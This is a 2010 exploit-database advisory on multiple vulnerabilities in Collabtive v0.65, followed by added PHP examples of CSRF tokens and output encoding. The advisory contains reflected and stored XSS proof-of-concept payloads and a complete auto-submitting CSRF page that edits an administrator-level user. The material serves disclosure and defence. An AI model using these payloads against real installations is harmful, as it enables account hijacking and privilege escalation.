
[webapps / 0day] - Collabtive v0.65 Multiple Vulnerabilities

Posted on 12 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />
<meta http-equiv='Content-Language' content='en' />
<title>Collabtive v0.65 Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title>
</head>
<body>
<pre>
=========================================
 Collabtive v0.65 Multiple Vulnerabilities
=========================================

### VULNERABLE PRODUCT ###

+ Description:
&quot;Collabtive provides a web based platform to bring the project management process and documentation online. Collabtive is an open source solution with features and functionality similar to proprietary software such as BaseCamp.&quot;

+ Homepage: http://www.collabtive.com

### VULNERABILITY DETAILS ###

I. Non-persistent Cross-site Scripting
--------------------------------------

+ Description:
The application inserts the HTTP &quot;y&quot; parameter of &quot;manageajax.php&quot; and the HTTP &quot;pic&quot; parameter of &quot;thumb.php&quot; into its HTML output without sanitizing these user-supplied inputs.
Attackers can execute malicious JavaScript code or hijack the PHPSESSID cookie for privilege escalation.

+ Exploit/POC:
http://target/manageajax.php?action=newcal&amp;y=&lt;script&gt;alert(/XSS/)&lt;/script&gt;
http://target/thumb.php?pic=&lt;script&gt;alert(/XSS/)&lt;/script&gt;

II. Cross-site Request Forgery
------------------------------

+ Description:
Collabtive is affected by Cross-site Request Forgery. Technically, an attacker can create a specially crafted page, force a Collabtive administrator to visit it, and gain administrative privileges. To prevent CSRF vulnerabilities, the application needs anti-CSRF tokens, a captcha, and a request for the old password on critical actions.

--&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Collabtive CSRF P0C&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form method=&quot;post&quot; action=&quot;http://collabtive/admin.php?action=edituser&amp;id=2&quot; enctype=&quot;multipart/form-data&quot; name=&quot;csrfXploit&quot;&gt;
  &lt;input type=&quot;hidden&quot; value=&quot;hacker&quot; name=&quot;name&quot; /&gt;
  &lt;input type=&quot;hidden&quot; value=&quot;hacker@hacker&quot; name=&quot;email&quot; /&gt;
  &lt;input type=&quot;hidden&quot; value=&quot;m&quot; name=&quot;gender&quot; /&gt;
  &lt;input type=&quot;hidden&quot; value=&quot;en&quot; name=&quot;locale&quot; /&gt;
  &lt;input type=&quot;hidden&quot; value=&quot;&quot; name=&quot;admin&quot; /&gt;
  &lt;input type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;role&quot;&gt;
&lt;/form&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
document.csrfXploit.submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

III. Stored Cross-site Scripting
--------------------------------

+ Description:
Collabtive has a Stored Cross-site Scripting vulnerability. Every user can change their username; the application accepts HTML in it and stores it in the database unchanged.

+ Exploit/POC:
Change the username to &quot;user&lt;script&gt;alert(/AS/)&lt;/script&gt;&quot;.

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-12]
</pre>
</body>
</html>
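A defender's counterpart to section II above, added here as an example and not part of the Inj3ct0r advisory or of Collabtive's code base: a synchronizer-token check in PHP (Collabtive's own language) of the kind the advisory recommends for state-changing actions such as the admin.php?action=edituser handler. The function names, the `csrf_token` field and session key, and the constructed requests at the bottom are assumptions of this example.

```php
<?php
// Added example (not Collabtive's code): synchronizer-token CSRF protection
// for a state-changing handler. Names below are this example's own assumptions.

declare(strict_types=1);

const CSRF_SESSION_KEY = 'csrf_token';

// Return the per-session token, creating it on first use.
// Pass $_SESSION here in a real application; an array is used for the demo.
function csrfToken(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        // 32 random bytes -> 64 hex characters; a cross-site page cannot read it.
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

// Compare the submitted token with the session token in constant time.
// $submitted is left untyped because form data may arrive as an array.
function csrfTokenIsValid(array $session, $submitted): bool
{
    if (!is_string($submitted) || empty($session[CSRF_SESSION_KEY])) {
        return false;
    }
    return hash_equals($session[CSRF_SESSION_KEY], $submitted);
}

// Hidden field to embed in every form the application renders for a
// state-changing action (the token is HTML-encoded as a precaution).
function csrfHiddenField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '" />';
}

// Guard to call at the top of a handler such as edituser: the request must be
// a POST and must carry the session's token. Returns true when it may proceed.
// The check does not depend on the Content-Type, so a multipart/form-data
// submission like the one in the advisory is treated the same as any other.
function csrfGuard(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;   // GET requests must never change state
    }
    return csrfTokenIsValid($session, $post['csrf_token'] ?? null);
}

// Constructed requests for demonstration (no server or real session involved).
$session = [];
$legit   = ['name' => 'alice',  'role' => '1', 'csrf_token' => csrfToken($session)];
$forged  = ['name' => 'hacker', 'role' => '1'];                       // cross-site form: no token
$guessed = ['name' => 'hacker', 'role' => '1', 'csrf_token' => str_repeat('0', 64)];

echo "form field: ", csrfHiddenField($session), "\n";
echo "legitimate POST: ", var_export(csrfGuard($session, 'POST', $legit), true), "\n";
echo "forged POST without token: ", var_export(csrfGuard($session, 'POST', $forged), true), "\n";
echo "forged POST with guessed token: ", var_export(csrfGuard($session, 'POST', $guessed), true), "\n";
echo "GET with valid token: ", var_export(csrfGuard($session, 'GET', $legit), true), "\n";
```

The guard has to sit in the server-side action itself, not in the page that renders the form, because the advisory's proof of concept never loads the application's own form; it submits a form hosted elsewhere. The token is the minimum the advisory asks for; re-prompting for the current password on role changes, as it also suggests, adds a second check that a forged request cannot supply.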

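The fix for sections I and III above, added as an example that is not part of the advisory or of Collabtive's code: the reflected parameters of manageajax.php and thumb.php are validated against the shape they are supposed to have, and every value written into HTML, including a stored username, is encoded at output time with htmlspecialchars. The functions `h`, `renderYear`, `renderThumb` and `renderUsername` and the constructed inputs at the bottom are this example's own assumptions.

```php
<?php
// Added example (not Collabtive's code): input validation plus output encoding
// for the reflected (I) and stored (III) cross-site scripting cases.

declare(strict_types=1);

// Encode a string for insertion into HTML text or a quoted attribute.
// ENT_QUOTES also escapes single quotes, so the value is safe inside '...'
// attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reflected case, "y" parameter: a calendar year is four digits. Anything
// else falls back to the current year, and the echoed value is encoded anyway.
function renderYear(?string $y): string
{
    if ($y === null || !preg_match('/^\d{4}$/', $y)) {
        $y = date('Y');
    }
    return '<input type="hidden" name="y" value="' . h($y) . '" />';
}

// Reflected case, "pic" parameter: a file name is matched against a whitelist
// of safe characters; path separators and markup are rejected, not stripped.
function renderThumb(?string $pic): string
{
    if ($pic === null || !preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $pic)) {
        return '<span class="error">invalid thumbnail name</span>';
    }
    return '<img src="thumb.php?pic=' . h(rawurlencode($pic)) . '" alt="' . h($pic) . '" />';
}

// Stored case: the username is stored exactly as typed (so the record stays
// intact) and encoded every time it is rendered, on every page.
function renderUsername(string $storedName): string
{
    return '<span class="user">' . h($storedName) . '</span>';
}

// Constructed inputs mirroring the advisory's proof-of-concept payloads.
$payload = '<script>alert(/XSS/)</script>';
echo renderYear($payload), "\n";
echo renderYear('2010'), "\n";
echo renderThumb($payload), "\n";
echo renderThumb('photo-1.jpg'), "\n";
echo renderUsername('user' . $payload), "\n";
```

Encoding at output rather than stripping at input is what covers the stored case: a username that was saved before the fix is still rendered harmlessly once every page passes it through `h()`. The validation step in the reflected handlers is defence in depth; `h()` alone already neutralizes the script tag in the advisory's URLs.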